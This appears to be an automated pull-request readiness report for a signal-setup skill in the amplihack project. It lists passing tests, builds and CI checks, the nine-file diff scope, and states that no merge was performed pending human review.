Quality-audit evidence: 3 SEEK → VALIDATE → FIX cycles ended clean (zero critical/high; zero medium correctness/security findings). Final hermetic suite on head `0af6da63` is 99/0 passing.

### Local validation

- `bash amplifier-bundle/skills/signal-setup/tests/run_all_tests.sh` → pass (99/0).
- `pre-commit run --files amplifier-bundle/skills/signal-setup/README.md docs/skills/SKILL_CATALOG.md` → pass.
- Earlier PR validation after code hardening: `cargo clippy --all-targets -- -D warnings`, `cargo test -p amplihack-signal --features signal`, targeted `cargo test -p amplihack-cli --features signal --test signal_setup_idempotency`, and `cargo build -p amplihack --features amplihack-cli/signal` passed. Full CLI package test was blocked by local disk exhaustion, not a test failure.
- No `git --no-verify`; no admin bypass.

### Checks / build validation

Evidence source: `gh pr checks 993` on head `0af6da63a9b8ea7c8be4ce2e7d5b9a84c2ab0f31`.

Required branch-protection checks: **ALL 7 PASSED**
- `Lint & Format` — pass
- `Test` — pass
- `Install Smoke Test` — pass
- `Build x86_64-unknown-linux-gnu` — pass
- `Build aarch64-unknown-linux-gnu` — pass
- `Build x86_64-apple-darwin` — pass
- `Build aarch64-apple-darwin` — pass

Other checks: `GitGuardian Security Checks` pass; `build` pass; `scan`, `deploy`, and `Release` skipped by path/branch condition.

### Scope

- `git diff --name-only origin/main...HEAD`: exactly 9 files — signal-setup skill docs/script/tests, `docs/skills/SKILL_CATALOG.md`, and `tests/scenarios/signal-setup-skill.yaml`.
- Unrelated changes: **none**.
- Version bump files from duplicate PR #1001 (`Cargo.toml`, `Cargo.lock`, `package.json`) are **not** present in this PR diff.

### Final merge/close verification

- Intended final action: readiness only — **not merged** per instruction.
- Final action performed: **no merge invoked**.
- Remaining external gates: any human approval/review gate outside this automation's authority; branch protection required checks are green.
